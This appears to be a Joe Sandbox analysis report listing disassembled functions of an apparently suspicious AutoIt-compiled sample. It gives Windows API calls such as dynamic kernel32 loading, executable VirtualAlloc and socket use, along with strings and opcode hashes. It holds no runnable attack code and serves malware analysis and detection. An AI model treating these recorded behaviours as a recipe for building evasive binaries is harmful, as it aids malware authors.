                                                        • Part of subcall function 00A67BB1: _memmove.LIBCMT ref: 00A67C0B
                                                      • __swprintf.LIBCMT ref: 00A7302D
                                                      Strings
                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00A72EC6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                      • API String ID: 1943609520-557222456
                                                      • Opcode ID: 05b633ccb4db4dc6f2413241fbf9d66618aa55869a2f6149a8c8815d0741d8fb
                                                      • Instruction ID: c6792d350597dec5a78065a1b587b6c3f95ef350a7ebffb6f4d53d20df443319
                                                      • Opcode Fuzzy Hash: 05b633ccb4db4dc6f2413241fbf9d66618aa55869a2f6149a8c8815d0741d8fb
                                                      • Instruction Fuzzy Hash: D29179725183019FCB28EF24DE95C6EB7B8EF85740F04891DF4969B2A1DB20EE45CB52
                                                      APIs
                                                        • Part of subcall function 00A648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A648A1,?,?,00A637C0,?), ref: 00A648CE
                                                      • CoInitialize.OLE32(00000000), ref: 00ACBC26
                                                      • CoCreateInstance.OLE32(00AF2D6C,00000000,00000001,00AF2BDC,?), ref: 00ACBC3F
                                                      • CoUninitialize.OLE32 ref: 00ACBC5C
                                                        • Part of subcall function 00A69997: __itow.LIBCMT ref: 00A699C2
                                                        • Part of subcall function 00A69997: __swprintf.LIBCMT ref: 00A69A0C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                      • String ID: .lnk
                                                      • API String ID: 2126378814-24824748
                                                      • Opcode ID: 52d06229d97e5ee7775f95d9fedc7c84cdbe7710197984a1507d962db8cfe653
                                                      • Instruction ID: 597d864ccfb29478d76ec1151e4a4d82c825b49f54bd8dca5284d0a69a86f397
                                                      • Opcode Fuzzy Hash: 52d06229d97e5ee7775f95d9fedc7c84cdbe7710197984a1507d962db8cfe653
                                                      • Instruction Fuzzy Hash: 0BA112756042019FCB10DF14C985E6ABBF5FF88314F15899CF89A9B2A1CB32ED45CBA1
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 00A852DD
                                                        • Part of subcall function 00A90340: __87except.LIBCMT ref: 00A9037B
                                                      Strings
                                                      Similarity
                                                      • API ID: ErrorHandling__87except__start
                                                      • String ID: pow
                                                      • API String ID: 2905807303-2276729525
                                                      • Opcode ID: 4af7bdad867834d3a3ea76951d5b42962a7ec0d4fc9238368f3d6f198a8e3f44
                                                      • Instruction ID: 2e078975b8cbfc83de0537a12b267656c6bfd81ff5c10c06181ad661c311f9a1
                                                      • Opcode Fuzzy Hash: 4af7bdad867834d3a3ea76951d5b42962a7ec0d4fc9238368f3d6f198a8e3f44
                                                      • Instruction Fuzzy Hash: B9515831F1CA018BCF11B774CA517BE2BE4DB40790F208968E8D58A2E5EE748CD5DB42
                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #$+
                                                      • API String ID: 0-2552117581
                                                      • Opcode ID: 531ea843d79c8f7d54ccfac1df314aba882898dbbdc00e1ceb7fc13623e32f79
                                                      • Instruction ID: 88fdb5a5ce6d042f72873a3dcb7793a1f66ee49056bdc8b2063631a43a92ff4b
                                                      • Opcode Fuzzy Hash: 531ea843d79c8f7d54ccfac1df314aba882898dbbdc00e1ceb7fc13623e32f79
                                                      • Instruction Fuzzy Hash: 8F5131759046468FDF25EF38C488BFA7BB8EF2A310F140155E8919F2A2D7349C46CB60
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: _memset$_memmove
                                                      • String ID: ERCP
                                                      • API String ID: 2532777613-1384759551
                                                      • Opcode ID: f0ba33ba4b1d90e08841a72e0b8e3dd75641848561134e3b355f81f8a14512ab
                                                      • Instruction ID: e0be78f76fa3f12a75a62725f0b5e90d97f7ad242f92e71ba79a2c9e2c1e1b43
                                                      • Opcode Fuzzy Hash: f0ba33ba4b1d90e08841a72e0b8e3dd75641848561134e3b355f81f8a14512ab
                                                      • Instruction Fuzzy Hash: 2B5191719007099BDB24CF65C991BEABBF8EF04714F20C56EE54ECB241E7719684CB50
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00AEF910,00000000,?,?,?,?), ref: 00AE7C4E
                                                      • GetWindowLongW.USER32 ref: 00AE7C6B
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AE7C7B
                                                      Strings
                                                      Similarity
                                                      • API ID: Window$Long
                                                      • String ID: SysTreeView32
                                                      • API String ID: 847901565-1698111956
                                                      • Opcode ID: 28f3f3ccab43222421d8ff677843b7dde4ceaf98103c41dbbfdaef7425985188
                                                      • Instruction ID: 049175edd0a2955a56536c249c855961cf4a3fef61ead64d91dcb2de293074ad
                                                      • Opcode Fuzzy Hash: 28f3f3ccab43222421d8ff677843b7dde4ceaf98103c41dbbfdaef7425985188
                                                      • Instruction Fuzzy Hash: FF31BE31204685AFDB119F39DC45BEA77A9EB45324F244725F875932E0C731E8519B60
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00AE76D0
                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00AE76E4
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AE7708
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: SysMonthCal32
                                                      • API String ID: 2326795674-1439706946
                                                      • Opcode ID: 6e4ac723545c6c3e44b0a9abb3a54cf6415ddedaeddb89bf852d5a8fb07e1e7d
                                                      • Instruction ID: 470c1b3e8548722544df243e0f7f3d11020b83f598eb4ec2364c00ed57c2235e
                                                      • Opcode Fuzzy Hash: 6e4ac723545c6c3e44b0a9abb3a54cf6415ddedaeddb89bf852d5a8fb07e1e7d
                                                      • Instruction Fuzzy Hash: 67219F32500259ABDF11CFA5CC86FEE3B79EB48714F110254FE156B1D0DAB1AC519BA0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00AE6FAA
                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00AE6FBA
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00AE6FDF
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend$MoveWindow
                                                      • String ID: Listbox
                                                      • API String ID: 3315199576-2633736733
                                                      • Opcode ID: 25095a8d79d5aeb206243824f206891f346d88a5e41fd5f544819a492f151c8f
                                                      • Instruction ID: 3735d628522026a3d29afdf8ef23ef818916aa7afbd2beb7a08aab9af0a5d9a1
                                                      • Opcode Fuzzy Hash: 25095a8d79d5aeb206243824f206891f346d88a5e41fd5f544819a492f151c8f
                                                      • Instruction Fuzzy Hash: 8E21A432610158BFDF118F55DC85FAB3BBAEF997A4F018524F9149B1A0CA71AC52CBA0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00AE79E1
                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00AE79F6
                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00AE7A03
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: msctls_trackbar32
                                                      • API String ID: 3850602802-1010561917
                                                      • Opcode ID: 20db031e783ab25e1120da45f5e34928b0c24d5d0d46b69c2c49ca2e8db577ca
                                                      • Instruction ID: 03b2dd26156d8d12de4bac29891df0b939b5249bbef5263ef01cbd616bccba98
                                                      • Opcode Fuzzy Hash: 20db031e783ab25e1120da45f5e34928b0c24d5d0d46b69c2c49ca2e8db577ca
                                                      • Instruction Fuzzy Hash: B111E372244288BFEF209F61CC05FEF3BA9EF89764F010529FA41A70A1D6719851DB60
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00A64C2E), ref: 00A64CA3
                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00A64CB5
                                                      Strings
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                      • API String ID: 2574300362-192647395
                                                      • Opcode ID: 1f86d81e2ac00e58c0ab3f0e88dd808fae0c147e6759e03dcfea720fe3301025
                                                      • Instruction ID: 9a8c1371165cad1f461dbea933e12ff41105206ea5b97241207b9fd281b0032c
                                                      • Opcode Fuzzy Hash: 1f86d81e2ac00e58c0ab3f0e88dd808fae0c147e6759e03dcfea720fe3301025
                                                      • Instruction Fuzzy Hash: EED01770910767DFDB209F72DA5860676E5EF09791B11CC7E9886DA250E670D880CB50
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00A64CE1,?), ref: 00A64DA2
                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A64DB4
                                                      Strings
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                      • API String ID: 2574300362-1355242751
                                                      • Opcode ID: 6dfa514a145b31a4da8a035bb9f874114a16a0742e6eb06ba9106381ed41fa4f
                                                      • Instruction ID: 1a2b9d8a8f68813322291c2e15c722853468facf5bb29fbacf385be010308f3b
                                                      • Opcode Fuzzy Hash: 6dfa514a145b31a4da8a035bb9f874114a16a0742e6eb06ba9106381ed41fa4f
                                                      • Instruction Fuzzy Hash: B2D017B1950713DFEB209F71D848A8676E4EF09355B11C83ED8C6DA160EB70D880CB50
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00A64D2E,?,00A64F4F,?,00B262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A64D6F
                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A64D81
                                                      Strings
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                      • API String ID: 2574300362-3689287502
                                                      • Opcode ID: 20b1d6586688ce51881d8908cc0a44d2656b1994f07b2ed87845e4de47c6b1d6
                                                      • Instruction ID: 272174a6fd9f7a6aca57758dd6ddb5d3ffc95c592a15dd2460d07f94968d7997
                                                      • Opcode Fuzzy Hash: 20b1d6586688ce51881d8908cc0a44d2656b1994f07b2ed87845e4de47c6b1d6
                                                      • Instruction Fuzzy Hash: 54D01730910753DFDB209F71D84865676E8FF19392B11C93E9486DA2A0EA70D880CB50
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00AE12C1), ref: 00AE1080
                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00AE1092
                                                      Strings
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                      • API String ID: 2574300362-4033151799
                                                      • Opcode ID: 7c8b79eaebb76060efa175a265017000202c7bc0e4d4df2f375a332522bb8cd5
                                                      • Instruction ID: d52ed98d7a9938898e5ce50413d82151f628b1ad8f6f87e8c802ba60bb502c29
                                                      • Opcode Fuzzy Hash: 7c8b79eaebb76060efa175a265017000202c7bc0e4d4df2f375a332522bb8cd5
                                                      • Instruction Fuzzy Hash: 54D017315107A2CFD7209F76D858A5ABAE4EF49361B118D7EA48ADA160E7B0C8C0CB90
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00AD9009,?,00AEF910), ref: 00AD9403
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00AD9415
                                                      Strings
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                      • API String ID: 2574300362-199464113
                                                      • Opcode ID: d9c1ef7802fc987a8d7a3bae61532bfadb18996246886221c76850e854251164
                                                      • Instruction ID: e7e11af92274bb15c26a22310e2556f365503b8ef9ffd60276df85bac09d1770
                                                      • Opcode Fuzzy Hash: d9c1ef7802fc987a8d7a3bae61532bfadb18996246886221c76850e854251164
                                                      • Instruction Fuzzy Hash: 15D0C770640717CFCB208F71C94820372E4EF01341B00C83EA482EA660E770C880CB50
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: LocalTime__swprintf
                                                      • String ID: %.3d$WIN_XPe
                                                      • API String ID: 2070861257-2409531811
                                                      • Opcode ID: a105dfd77b17cd1bd09bf34225a7932d1b73fb2e8394d16364f491e5d00fdffc
                                                      • Instruction ID: 4c0f5106e75051a7cefc4527207ec6a8daa5ddd067918ee2eaed4deab39e74f0
                                                      • Opcode Fuzzy Hash: a105dfd77b17cd1bd09bf34225a7932d1b73fb2e8394d16364f491e5d00fdffc
                                                      • Instruction Fuzzy Hash: 06D012B1804118FACB04EA90DC848F9B77CA705311F5405D2F502D3080F3359B859B31
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 96419654962d1b602f69c4dda18b9bce238a604a959d2822c07faf93be29010d
                                                      • Instruction ID: 332c0d79815f3d2dc996bcfab77f50b357e18dd5448de7b7ddd0f39d85e4ba59
                                                      • Opcode Fuzzy Hash: 96419654962d1b602f69c4dda18b9bce238a604a959d2822c07faf93be29010d
                                                      • Instruction Fuzzy Hash: 08C16175A04216EFCB14CF98C884EAEB7F9FF88714B158599E805EB252D770DE81CB90
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?), ref: 00ADE3D2
                                                      • CharLowerBuffW.USER32(?,?), ref: 00ADE415
                                                        • Part of subcall function 00ADDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00ADDAD9
                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00ADE615
                                                      • _memmove.LIBCMT ref: 00ADE628
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                      • String ID:
                                                      • API String ID: 3659485706-0
                                                      • Opcode ID: 35c2d27272d464c2ca4775ecadfef50768ac87d25a445e13e8a1a191a77f5090
                                                      • Instruction ID: 04032e20aab35b38b52ef502e2359c1ce7154c752fd67d79dfbebe86e642079c
                                                      • Opcode Fuzzy Hash: 35c2d27272d464c2ca4775ecadfef50768ac87d25a445e13e8a1a191a77f5090
                                                      • Instruction Fuzzy Hash: 1AC148716083019FC714EF28C48096ABBF4FF89758F14896EF89A9B351D731E946CB82
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 00AD83D8
                                                      • CoUninitialize.OLE32 ref: 00AD83E3
                                                        • Part of subcall function 00ABDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00ABDAC5
                                                      • VariantInit.OLEAUT32(?), ref: 00AD83EE
                                                      • VariantClear.OLEAUT32(?), ref: 00AD86BF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                      • String ID:
                                                      • API String ID: 780911581-0
                                                      • Opcode ID: c2708a1d431799b8393c501289afbf7aef50b68754dde32970c838d13ac4f90e
                                                      • Instruction ID: dae1d9cd1b4afe709904eba6b4407d03440204141c33055eb1de115830ce2802
                                                      • Opcode Fuzzy Hash: c2708a1d431799b8393c501289afbf7aef50b68754dde32970c838d13ac4f90e
                                                      • Instruction Fuzzy Hash: 67A128752047019FCB10EF64C995A2AB7F4BF88364F18845DF99A9B3A1CB34ED05CB46
                                                      APIs
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00AF2C7C,?), ref: 00AB7C32
                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00AF2C7C,?), ref: 00AB7C4A
                                                      • CLSIDFromProgID.OLE32(?,?,00000000,00AEFB80,000000FF,?,00000000,00000800,00000000,?,00AF2C7C,?), ref: 00AB7C6F
                                                      • _memcmp.LIBCMT ref: 00AB7C90
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: FromProg$FreeTask_memcmp
                                                      • String ID:
                                                      • API String ID: 314563124-0
                                                      • Opcode ID: 2f5b04f2dd1e12594661587483e3c76028e2f6d10b8172a3099c669b22686988
                                                      • Instruction ID: c38d0c6668f5aea3ad9f857b67a3f40323acd91e2fd767a81164427959a03c16
                                                      • Opcode Fuzzy Hash: 2f5b04f2dd1e12594661587483e3c76028e2f6d10b8172a3099c669b22686988
                                                      • Instruction Fuzzy Hash: 7D81F975A00109EFCB04DF94C984EEEB7B9FF89315F204598F516AB251DB71AE06CB60
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Variant$AllocClearCopyInitString
                                                      • String ID:
                                                      • API String ID: 2808897238-0
                                                      • Opcode ID: d49e620d1f1ac6def2edc2ed16836823fb20d6aa40ae2b6566494a5a6a47aef3
                                                      • Instruction ID: a2a55634f50e64297588acdcdc294a441ea6ec368e345279affd772eea23436f
                                                      • Opcode Fuzzy Hash: d49e620d1f1ac6def2edc2ed16836823fb20d6aa40ae2b6566494a5a6a47aef3
                                                      • Instruction Fuzzy Hash: 195186306043019EDB24AF75D995ABEB3FDAF48310F20981FF556CB693DA749844AB11
                                                      APIs
                                                      • GetWindowRect.USER32(0159E488,?), ref: 00AE9AD2
                                                      • ScreenToClient.USER32(00000002,00000002), ref: 00AE9B05
                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00AE9B72
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientMoveRectScreen
                                                      • String ID:
                                                      • API String ID: 3880355969-0
                                                      • Opcode ID: d0802592919bb805e13683ae1754bb565cc5fa3287e0d363af74e00eede84de6
                                                      • Instruction ID: bccaea22fe06fef90b9c0c450be75f2c5120a3f2df28d8440c4e3b69375cb3be
                                                      • Opcode Fuzzy Hash: d0802592919bb805e13683ae1754bb565cc5fa3287e0d363af74e00eede84de6
                                                      • Instruction Fuzzy Hash: 66513F34A00289EFCF20DF69D981AAF7BB6FF55360F148169F8159B290D730AD51CB90
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00AD6CE4
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AD6CF4
                                                        • Part of subcall function 00A69997: __itow.LIBCMT ref: 00A699C2
                                                        • Part of subcall function 00A69997: __swprintf.LIBCMT ref: 00A69A0C
                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00AD6D58
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AD6D64
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$__itow__swprintfsocket
                                                      • String ID:
                                                      • API String ID: 2214342067-0
                                                      • Opcode ID: 44836d1da6175673d96984677340f7423c1b46dad1c66c977b8d55b97e24a39c
                                                      • Instruction ID: 994a2f5b10b4a84c958c3e12b8d078c0ee1652ff3ad2c5c4edd8aa2517c8a50c
                                                      • Opcode Fuzzy Hash: 44836d1da6175673d96984677340f7423c1b46dad1c66c977b8d55b97e24a39c
                                                      • Instruction Fuzzy Hash: F641AD75740200AFEB20AF24DD86F7A77F9EB08B10F448119FA5A9F3D2DA759C018B91
                                                      APIs
                                                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00AEF910), ref: 00AD67BA
                                                      • _strlen.LIBCMT ref: 00AD67EC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _strlen
                                                      • String ID:
                                                      • API String ID: 4218353326-0
                                                      • Opcode ID: 6a3ccefed302ef0a9831ef656bb3d67edbb23cc93c4d865f432e7cd715be43ca
                                                      • Instruction ID: 233a4ac22339e17793aeb6dcdc22e1cc2387c8ffbff5f4d1f6ec170601ff90fd
                                                      • Opcode Fuzzy Hash: 6a3ccefed302ef0a9831ef656bb3d67edbb23cc93c4d865f432e7cd715be43ca
                                                      • Instruction Fuzzy Hash: 9C418335A00104AFCB14EBA4DDD5EAEB7BDEF48750F14816AF8169B392DB30AD05D750
                                                      APIs
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00ACBB09
                                                      • GetLastError.KERNEL32(?,00000000), ref: 00ACBB2F
                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00ACBB54
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00ACBB80
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
